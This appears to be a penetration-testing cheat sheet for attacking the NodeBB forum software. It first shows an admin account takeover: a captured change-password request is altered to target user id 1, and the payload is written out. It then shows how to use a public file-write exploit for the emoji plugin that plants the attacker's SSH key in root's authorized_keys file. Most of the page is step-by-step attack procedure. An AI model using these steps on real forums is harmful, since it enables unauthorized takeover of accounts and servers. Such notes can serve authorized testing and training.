NodeBB

Exploiting NodeBB Forum Web Application

Admin Account Takeover

NodeBB Forum 1.12.2-1.14.2 - Account TakeoverExploit Database

Create a new NodeBB user

Go to Edit Profile. Then navigate to the Change Password page

Intercept with proxy tool ie. Burp Suite (community edition will work). Do not start intercepting until you are ready to click Change Password, or else there will be timeout issues

Start intercepting using the proxy tool, Change the UID to '1' (admin), press forward, then turn intercept off. You will need to be fast to avoid timeout, so don't fuck around.

426["user.changePassword",{"currentPassword":"p@ssword1","newPassword":"p@ssword2","uid":1}]

Use the new password to log into the NodeBB admin account and enjoy 😄

Aribitrary File Upload

Upload file with NodeBB admin account

NodeBB Plugin Emoji 3.2.1 - Arbitrary File WriteExploit Database

Copy exploit to a local folder and open in your favorite text editor

cp /usr/share/exploitdb/exploits/multiple/webapps/49813.py nodebbexploit.py
vim nodebbexploit.py

Change the following parameters in the python file to match your target/host machines and NodeBB admin credentials

TARGET = 'http://192.168.1.1:4567'
USERNAME = 'admin'
PASSWORD = 'password'
DESTINATION_FILE = '/root/.ssh/authorized_keys'
SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'